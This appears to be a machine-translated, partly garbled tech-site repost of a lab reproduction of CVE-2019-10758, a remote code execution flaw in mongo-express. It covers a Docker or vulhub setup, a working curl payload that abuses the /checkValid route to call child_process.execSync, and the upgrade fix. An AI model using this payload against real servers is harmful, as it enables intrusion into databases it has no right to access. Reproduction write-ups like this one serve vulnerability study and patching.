Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

How does Mongo-express remote code perform CVE-2019-10758 reproduction

2025-03-29 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Internet Technology >

Share

Shulou(Shulou.com)06/01 Report--

Mongo-express remote code how to perform CVE-2019-10758 reproduction, in view of this problem, this article introduces the corresponding analysis and solution in detail, hoping to help more partners who want to solve this problem to find a more simple and easy way.

About 0x01 Mongo-express is a database management tool for MongoDB, similar to the relationship between Navicat and Mysql. It uses a Web-based MongoDB graphical management interface written by Node.js,Express and Bootstrap3.

Overview of 0x02 vulnerabilities

The vulnerability lies in the toBSON () function in lib/bson.js, where the route / checkValid receives input from the outside and invokes code with a RCE vulnerability, resulting in a risk of exploitation.

0x03 affects version mongo-express

< 0.54.0 0x04 环境搭建 使用docker首先搭建MongoDB数据库 docker run --name MyMongo -d mongo:3.2 再搭建一个存在漏洞版本得express并连接到上面得MongoDB docker run -it --rm -p 8081:8081 --link MyMongo:mongo mongo-express:0.49 看到以下信息即可说明搭建成功 访问本机8081端口,可以看到Mongo-express界面

Of course, you can also use vulhub directly.

Git clone https://github.com/vulhub/vulhub.gitcd vulhub/mongo-express/CVE-2019-10758docker-compose up-d

Recurrence of 0x05 vulnerabilities

Use online Poc

Curl 'http://localhost:8081/checkValid'-H' Authorization: Basic YWRtaW46cGFzcw=='-- data 'document=this.constructor.constructor ("return process") (). MainModule.require ("child_process"). ExecSync ("echo Str1am > file.txt")'

If you see that Valid is returned and the MongoDB interface returns 200, it is a success.

View the files created

0x06 repair mode

Upgrade to version 0.54.0 or above

This is the answer to the question about how the Mongo-express remote code performs CVE-2019-10758 reproduction. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 245

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Internet Technology

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report